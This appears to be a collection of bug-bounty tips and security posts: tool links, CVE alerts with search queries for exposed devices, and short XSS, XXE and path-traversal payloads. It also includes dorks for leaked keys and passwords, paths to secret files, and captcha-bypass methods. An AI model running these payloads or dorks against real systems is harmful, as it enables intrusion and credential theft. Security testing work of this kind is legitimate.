AungRecon

AungRecon is a comprehensive, automated reconnaissance script for web application security assessments. It performs multiple security checks and scans on a target domain, including subdomain enumeration, SQL injection, XSS, open redirects, LFI vulnerabilities, and more. The tool integrates several popular security tools, streamlining the workflow of security analysts and penetration testers.

Features :

WhatWeb Scan: Identifies technologies, plugins, and versions used by the target website.
Subdomain Enumeration: Discovers and filters alive subdomains.
Subdomain Takeover Detection: Identifies possible subdomain takeovers.
SQL Injection Detection: Searches for SQLi vulnerabilities using parameterized URLs.
Cross-Site Scripting (XSS) Detection: Scans for XSS vulnerabilities.
Open Redirect Detection: Finds possible open redirect vulnerabilities.
Local File Inclusion (LFI) Detection: Identifies possible LFI vulnerabilities.
Nuclei Vulnerability Scans: Executes multiple vulnerability templates via Nuclei.

Link:

https://github.com/aungsanoo-usa/aungrecon?tab=readme-ov-file

Installation:

Clone the repository:
git clone https://github.com/aungsanoo-usa/aungrecon.git
cd aungrecon
chmod +x install.sh
chmod +x aungrecon.sh

Usage: To run AungRecon on a target domain, simply execute the script with the following command:
./install.sh
./aungrecon.sh

Injectra: Payload Injection via File Magic Numbers

Injectra is a robust tool designed for injecting custom payloads into files based on their magic numbers. By leveraging this technique, Injectra modifies files for penetration testing and security research purposes. The tool detects the file type by analyzing its magic numbers and injects the payload seamlessly into the correct position.

Features

- Magic Number-Based Payload Injection: Identifies file types using magic numbers and injects payloads precisely into their headers.

- Customizable Payloads: Supports user-defined payloads, with a default PHP-based payload for command execution.

- Broad File Type Support: Compatible with file types like zip, rar, docx, jpg, png, pdf, and more.

- Interactive CLI: Includes features like auto-completion for file paths and detailed prompts to guide users.

- Dependency Management: Automatically checks and installs required Python packages.

https://github.com/AnonKryptiQuz/Injectra

#tools #payload #injection

Finding the real IP behind Cloudflare has never been so easy. Here you are a tool to search on shodan

starting from a simple favicon

- https://github.com/pielco11/fav-up

#infosec #cybersec #bugbountytips

Quick and dirty way to find parameters vulnerable to LFI & Path Traversal & SSRF & Open Redirect:

Burp Search > Regex
\?.*=(\/\/?\w+|\w+\/|\w+(%3A|:)(\/|%2F)|%2F|[\.\w]+\.\w{2,4}[^\w])

And find potentially vulnerable SSRF params

- https://github.com/In3tinct/See-SURF

A Python based scanner to find potential SSRF parameters in a web application. See-SURF helps you detect potential SSRF parameters and validates the finding it by making a DNS/HTTP request back to your server. It can be added to your arsenal of recon while doing bug hunting/web security testing.




#SSRF #cybersec #lfi

CVE-2024-22024, XXE on Ivanti Connect Secure

payload , encode it to base64:

<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % xxe SYSTEM "http://{{external-host}}/x"> %xxe;]><r>

</r> send it to 127.0.0.1/dana-na/auth/saml-sso.cgi with SAMLRequest

#bugbountytips #cve #infosec

⚠️ Alert
CVE-2025-0070 and CVE-2025-0066 : Two Critical Vulnerabilities in NetWeaver AS for ABAP and ABAP Platform

📊 3.2K+ Services are found on hunter.how yearly.

🔗Hunter Link:hunter.how/list?searchVal…

👇Query
HUNTER :product.name="SAP NetWeaver AS for ABAP"

Refer:securityonline.info/critical-sap-f…

#hunterhow #infosec #infosecurity #OSINT #Vulnerability

Some essential HTTP status Codes

#BugBounty #bugbountytips #cybersecurity #cybersecuritytips

⚠️ Alert

CVE-2024-55591 : Zero-Day Vulnerability in Attacks on Fortinet Firewalls with Exposed Interfaces


🔗Hunter Link:hunter.how/list?searchVal…

👇Query

HUNTER :product.name="Fortinet Firewall"

FOFA : product="FORTINET-Firewall"

📰Refer:securityonline.info/active-exploit…

#FORTINET #hunterhow #infosec #infosecurity #OSINT #fofa #Vulnerability #zeroday

Blind XSS in Private crypto target
Payload used

"><iframesrcdoc="&#60;&#115;&#99;&#114;&#105;&#112;&#116;&#62;&#118;#116;&#116;&#112;&#115;&#58;&#47;&#47;test.bxss.in&#34;&#59;&#117;&#109;&#101;&#110;&#116;&#46;&#62;">

#bugbountytips #bugbounty #payload

Bypass Cloudflare WAF (DOM-based XSS) ♻️

Payload:
'-alert?.(1)-'

writeup: 1337.or.id/post/stored-do…

#infosec #cybersec #bugbountytips

🐞 Bug Bounty Tip:

If you find Web frameworks like Symfony, add /app_dev.php/_profiler/open?file=app/config/parameters.yml to the wordlist, and you may get juicy data.

#bugbountytips #tips #cybersec #bugbounty

Uncover sensitive info with: inurl:notepad.link + keyword

Some example keywords:
aws_secret_access_key, "username=" "password=", VISA, PRIVATE KEY, "authToken="

More cool unpublished Dorks:

http://github.com/fatguru/dorks

#bugbountytip

⚡️ XSS Payload

Payload:

1%27;--<img%20src=x%20onerror=javascript:alert(document.domain)> 

#bugbountytips #xss #bugbounty #infosecc #cybersec

🚨 [CVE-2024-56145] Exploit released! 🚨

Details, PoC, and setup instructions:
🔗 https://github.com/Chocapikk/CVE-2024-56145

Learn more:
📖 https://assetnote.io/resources/research/how-an-obscure-php-footgun-led-to-rce-in-craft-cms

#bugbountytips #BugBounty

🔖Top 25 JavaScript path files used to store sensitive information in Web Application⬇️

01. /js/config.js
02. /js/credentials.js
03. /js/secrets.js
04. /js/keys.js
05. /js/password.js
06. /js/api_keys.js
07. /js/auth_tokens.js
08. /js/access_tokens.js
09. /js/sessions.js
10. /js/authorization.js 
11. /js/encryption.js
12. /js/certificates.js
13. /js/ssl_keys.js
14. /js/passphrases.js 
15. /js/policies.js
16. /js/permissions.js 
17. /js/privileges.js
18. /js/hashes.js
19. /js/salts.js
20. /js/nonces.js
21. /js/signatures.js
22. /js/digests.js
23. /js/tokens.js
24. /js/cookies.js
25. /js/topsecr3tdonotlook.js

#InfoSec #CyberSecurity #Hacking #BugBounty #bugbountyTools #bugbountytips #Pentest #Fuzzing

Plution is a convenient way to scan at scale for pages that are vulnerable to client side prototype pollution via a URL payload. In the default configuration, it will use a hardcoded payload that can detect 11 of the cases documented

⬇️ LINK:
- https://github.com/raverrr/plution


How to use:

Basic scan, output only to screen:
cat URLs.txt | plution

Scan with a supplied payload rather than hardcoded one:

cat URLs.txt|plution -p '__proto__.zzzc=example'

Note on custom payloads: The variable you are hoping to inject must be called or render to "zzzc". This is because 'window.zzzc' will be run on each page to verify pollution.

Output:

Passing '-o' followed by a location will output only URLs of pages that were successfully polluted.

Concurrency:

Pass the '-c' option to specify how many concurrent jobs are run (default is 5)

#infosec #cybersec #bugbountytips

⚠️ Alert ⚠️

CVE-2024-12084(CVSS 9.8) : Heap overflow that could lead to remote code execution

🔗Hunter Link:hunter.how/list?searchVal…

👇 Query
HUNTER : product.name="rsync"
FOFA : product="rsync"
SHODAN : product:"rsyncd"

📰 Refer:access.redhat.com/security/cve/C…

securityonline.info/cve-2024-12084…

sysdig.com/blog/detecting…

#RSYNC#hunterhow #infosec #infosecurity #OSINT #Vulnerability

Before intercepting even a single request in burp, enable the Binary and Images filter in the proxy history. maybe it hitting up Directory Traversals catching

load_image?img=assets/imgs/logo.png with ../../../../../etc/passwd

#infosec #cybersec #bugbountytips

📮 Pentesting Bluetooth: The Practical Guide to Hacking Bluetooth Low Energy

1. https://blog.attify.com/the-practical-guide-to-hacking-bluetooth-low-energy/
2. https://pentestpartners.com/security-blog/introduction-to-bluetooth-low-energy/
3. https://book.hacktricks.xyz/todo/radio-hacking/pentesting-ble-bluetooth-low-energy

#infosec #bluetooth

🚀 Captcha Bypass Techniques for Efficient Server Testing 🚀

Bypassing captchas can make server testing and automation easier. It's important to note that this is for testing purposes only, and the goal isn’t to compromise security, but to optimize workflows. Here are some methods to consider:

🔑 1. Parameter Manipulation

Omit Captcha Parameter: Skip the captcha parameter and try switching the HTTP method (e.g., POST → GET) or the data format (form data → JSON).
Submit Empty Captcha: Send the captcha parameter with no value.

🔍 2. Value Extraction & Reuse

Inspect Source Code: Look for captcha values hidden in the page’s source code.
Analyze Cookies: Check cookies for stored captcha values that might be reused.
Reuse Old Captcha: If a captcha was solved successfully, try using the same value. (Note: It may expire.)
Session Manipulation: Try reusing the same captcha value across different sessions or use the same session ID.

🤖 3. Automation & Recognition

Solve Math Captchas: Automate the calculation process for captchas involving simple math.
Image Recognition:
For image-based captchas, identify unique images (use MD5 hashes if limited).
Use OCR (Optical Character Recognition) tools like Tesseract to automate reading characters from images.

⚙️ 4. Additional Techniques

Rate Limit Testing: See if there are submission limits and find ways to bypass or reset them.
Use Third-Party Services: Leverage captcha-solving APIs or services.
Session & IP Rotation: Rotate your session IDs and IP addresses frequently to avoid detection.
User-Agent Manipulation: Change the User-Agent and headers to simulate different browsers or devices.
Audio Captcha Solving: Use speech-to-text services for audio captchas.

💡 Note: These techniques are meant for testing and automating workflows, not for bypassing security measures maliciously. Always ensure your actions are ethical and legal. 🔒

#bypass #Captcha #tricks #hacktricks

🚨 TP-Link Vulnerability CVE-2024-54887: Remote Code Execution 🚨

A critical vulnerability in TP-Link devices (CVE-2024-54887) has been discovered, allowing attackers to remotely execute code. This flaw could expose users to significant security risks if left unaddressed. Here’s

everything you need to know:

💡 What is CVE-2024-54887?

This vulnerability affects TP-Link routers and smart home devices, and it allows attackers to exploit a remote code execution (RCE) flaw. If exploited, an attacker can gain full control over the affected device.

⚠️ Risk of Exploitation

Remote Code Execution (RCE): Attackers can remotely run arbitrary code on the device, allowing them to gain control and potentially compromise the entire network.
Full Device Compromise: With RCE, an attacker can steal sensitive data, alter device configurations, or launch further attacks within the local network.
Impact on IoT Devices: The vulnerability affects a range of TP-Link devices, including routers and IoT products, which could be targeted for botnet attacks, espionage, or other malicious activities.

🛠 How Does the Exploit Work?

Exploiting the Vulnerability: Attackers can send specially crafted requests to the affected TP-Link devices, bypassing authentication mechanisms and executing arbitrary commands.
Exploitation via HTTP Requests: The vulnerability is triggered by manipulating HTTP requests to the vulnerable endpoint. Once triggered, it grants the attacker the ability to execute malicious commands on the device.

💥 Proof of Concept (PoC)

Exploiting the Bug: A PoC exploit has been released, demonstrating how easily this vulnerability can be triggered. It shows how an attacker can interact with a vulnerable device remotely and execute arbitrary code.
Code Execution Risk: The PoC highlights how the exploit can bypass authentication and escalate privileges, potentially leading to device takeover and exploitation.

🛡 How to Protect Yourself

Update Your Firmware:
TP-Link has released a patch to fix the vulnerability. Ensure your device is updated to the latest firmware version that addresses CVE-2024-54887.

Disable Remote Management:
Disable remote management features on your TP-Link device if you don’t need them, as this reduces the attack surface for potential exploits.

Network Segmentation:
Use network segmentation to isolate IoT devices from critical systems, making it harder for attackers to move laterally within your network.

Monitor Network Traffic:
Watch for unusual network traffic patterns, especially HTTP requests targeting your device’s IP, which may indicate exploitation attempts.

Use Strong Authentication:
Ensure strong passwords and two-factor authentication (2FA) are enabled for device access, reducing the chance of successful attacks.

📝 Key Takeaway:

The TP-Link vulnerability CVE-2024-54887 poses serious RCE risks to affected devices. Immediate patching, disabling remote management, and securing network access are critical steps to mitigate potential exploitation.

ZoomEye :

app="TP-LINK TL-WR940N WAP httpd"
6k+ results are found on ZoomEye.

ZoomEye Link: https://zoomeye.ai

Refer: https://securityonline.info/

#RCE #Cyberspacemapping #cybersecurity #ZoomEye #infosec2024